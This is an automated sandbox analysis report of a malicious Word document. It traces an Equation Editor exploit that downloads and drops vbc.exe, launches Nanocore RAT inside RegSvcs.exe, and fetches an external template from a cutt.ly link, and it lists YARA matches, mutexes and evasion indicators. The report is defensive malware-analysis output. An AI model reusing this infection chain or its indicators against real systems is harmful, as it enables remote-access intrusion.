Source: 9.2.RegSvcs.exe.770000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.770000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.890000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.890000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.2250000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2250000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.225e8a4.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.225e8a4.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.27027b4.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.27027b4.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.27027b4.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.27027b4.22.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.26f6574.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.26f6574.21.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.381ff26.25.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: vbc[1].exe.4.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 9.2.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 9.2.RegSvcs.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.RegSvcs.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOCX@10/24@68/4

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027BE2A AdjustTokenPrivileges,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0027BDF3 AdjustTokenPrivileges,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_003D0F0A AdjustTokenPrivileges,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_003D0ED3 AdjustTokenPrivileges,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$1e3984_by_Libranalysis.docx

Jump to behavior

Source: C:\Users\Public\vbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\rejjFHBZ
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{21f4355e-8257-4e77-8f1b-c822c6ea3cbe}

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC35E.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: ystem.pdb source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source:	Binary string: Rbvcs.pdbs~ source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source:	Binary string: pC:\Windows\System.pdb source: RegSvcs.exe, 00000009.00000002.2390017594.0000000004D9C000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source:	Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000009.00000002.2389919111.000000000473D000.00000004.00000001.sdmp
Source:	Binary string: System.pdbX source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: vbc.exe, 00000006.00000002.2131108315.0000000000E70000.00000002.00000001.sdmp, RegSvcs.exe, 00000009.00000002.2388359155.0000000000540000.00000002.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 9.2.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.RegSvcs.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 6_2_01389E87 push cs; retf
Source: C:\Users\Public\vbc.exe	Code function: 6_2_01388A79 push cs; iretd
Source: C:\Users\Public\vbc.exe	Code function: 6_2_01389E79 push cs; retf
Source: C:\Users\Public\vbc.exe	Code function: 6_2_01389477 push cs; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00287214 push esp; retn 0028h
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0028857F push ecx; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00286B49 push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002880F9 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_001A989B push ecx; retf 001Ah
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_001A9D1A push eax; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_001A9D1E pushad ; retf
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 9_2_001A5F05 push eax; ret

Source: initial sample

Static PE information: section name: .text entropy: 7.96059480846

Source: 9.2.RegSvcs.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 9.2.RegSvcs.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Contains an external reference to another document

Show sources

Source: webSettings.xml.rels

Binary or memory string: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="https://cutt.ly/dbzEXdF" TargetMode="External"/></Relationships>

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
